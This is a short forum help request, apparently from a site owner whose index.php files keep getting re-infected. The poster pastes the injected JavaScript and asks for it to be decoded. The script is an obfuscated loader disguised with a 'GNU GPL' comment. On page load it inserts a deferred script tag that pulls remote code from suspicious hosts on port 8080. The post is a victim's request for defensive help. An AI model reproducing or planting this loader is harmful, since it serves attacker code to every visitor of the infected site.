obfuscated code – can anyone decode?
-
This code is showing up on all my index.php files once I upload to the server. I’ve tried replacing all the index.php with clean files only to find this code on the files a few hours later again.
<script>/*GNU GPL*/ try{window.onload = function(){var Dwqlxqw7kr7vkv = document.createElement('s@$$^c&r!i^p&t^)#&'.replace(/\^|\$|\!|\(|&|\)|#|@/ig, ''));var N790b8w6sa8nl = 'U70yiuxmlrwd';Dwqlxqw7kr7vkv.setAttribute('type', 't&@^e!$&x^&!t!#/@(j!(a@v@)a(s!!!@c^^!r)&&i&p)^#t))'.replace(/\$|@|\(|#|\)|\^|\!|&/ig, ''));Dwqlxqw7kr7vkv.setAttribute('src', 'h$t$&$(t^@p!@^:!^$!/(!/)!a&!d))#^d@@i)^(c$!$&!t#$i)#(n()$!g(g(!a#m$!#e^!$s)^-#c(&o@$(!m!.^#&f(!c&@!$2&.#c^o^&m!.!z(#i(#d#!)d$!$u!#!-#!(c!o&@m!$#.($t!@h)$e&$g)@i^@!f(t!#@s#a(l$)&)e!.&^@r((u$#@:^$8@@^0&^!^8^^&0!@/@))g$)^@o$o&#$g(&l!(&)e$$.)#c@@o#m&/!!g(#o@$!o&g(!l$^#e@!.&($c!#o#m^#/^(d&$@i(^o^#n$(&.)#!n!)&e(!.)j!@p!#^$/@))v$!e))!r)(#i)!z^$@(o^((n)(.$n(@)e#@t$!/))^#w!^)i^&#r$($e#!@@$d)!!.#)&c#(@o(m&/&^'.replace(/\$|@|#|\(|&|\!|\)|\^/ig, ''));Dwqlxqw7kr7vkv.setAttribute('defer', 'd#e&)f@e)$r#)'.replace(/&|\(|#|@|\)|\$|\!|\^/ig, ''));Dwqlxqw7kr7vkv.setAttribute('id', 'L^)#6^!)^q@@c#!@@e@&@e^#^f$$@n#^@#7&f@l@^^('.replace(/\!|&|\$|\)|\^|@|#|\(/ig, ''));document.body.appendChild(Dwqlxqw7kr7vkv);}} catch(O27phyeucb2au4) {}</script>
- The topic ‘obfuscated code – can anyone decode?’ is closed to new replies.